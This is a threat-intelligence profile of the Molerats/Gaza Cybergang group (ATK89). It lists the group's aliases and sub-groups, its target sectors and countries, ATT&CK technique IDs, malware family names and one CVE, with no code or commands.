ATK89

Presumed Origin: State of Palestine < Back

Alias: Extreme Jackal, Gaza Hackers Team, Gaza cybergang, Gaza cybergang Group1, Molerats, Moonlight, Operation Molerats, TA402

ATK89 (aka: Molerats, Gaza Cybergang) is an Arabic politically motivated APT group, active all over the world, including in Europe and the US, but they are mainly active in the Middle East and North Africa (MENA) and in Palestine in particular. The group is comprised of three sub-groups:

 

  • Gaza Cybergang Group 1: aka MoleRATs: The group’s aim is to the infection of the victim in a RAT and it often makes use of text-sharing platforms, such as: PasteBin, github.com, upload.cat and more.

 

  • Gaza Cybergang Group 2: aka Desert Falcons: the group makes use of homemade malware, tools and techniques. Victims are often infected by social engineering methods such as fake websites that promise political information or spear phishing emails and social messaging.

 

  • Gaza Cybergang Group 3: aka Operation Parliament: The group is focused on espionage, covering on executive and judicial bodies all over the world, and focusing on MENA, particularly Palestine. the group used malware with CMD/PowerShell commands for its attacks. Each group is different in TTPs, but they make use of the same tools after gaining the initial grip on their victims.
  •  

ATK89 is a persistent threat to organizations and governments in the Middle East, routinely updating not only their malware implants, but also their delivery methods.

 

    REFERENCES

    Target sector

    • Aerospace
    • Defense
    • Energy
    • Financial Services
    • Government and administration agencies
    • High-Tech
    • Media

    Target countries

    • Afghanistan
    • Algeria
    • Canada
    • Chile
    • China
    • Denmark
    • Djibouti
    • Egypt
    • Germany
    • New Zealand
    • Morocco
    • Russian Federation
    • Qatar
    • North Macedonia
    • Palestine
    • Oman
    • Israel
    • Jordan
    • Korea, Republic of
    • Iraq
    • Iran, Islamic Republic Of
    • India
    • Kuwait
    • Libya
    • Lebanon
    • Latvia
    • Saudi Arabia
    • Serbia
    • Slovenia
    • Somalia
    • Syrian Arab Republic
    • Turkey
    • United Arab Emirates
    • United Kingdom Of Great Britain And Northern Ireland
    • United States Of America
    • Yemen

    Attack pattern

    • T1003 - Credential Dumping
    • T1008 - Fallback Channels
    • T1047 - Windows Management Instrumentation
    • T1057 - Process Discovery
    • T1091 - Replication Through Removable Media
    • T1116 - Code Signing
    • T1491 - Defacement
    • T1566.001 - Spearphishing Attachment
    • T1566.002 - Spearphishing Link

    Motivation

    • Ideology

    Malwares

    • DHS2015 / iRat
    • DHS Spyware
    • DropBook
    • DustySky
    • Falcons’ Backdoor
    • Falcons’ Downloader
    • LastConn
    • MoleNet
    • Molerat Loader
    • Pierogi
    • PoisonIvy
    • Scote
    • SharpStage
    • Spark
    • TajMahal APT Framework
    • XtremeRAT

    Vulnerabilities

    • CVE-2017-0199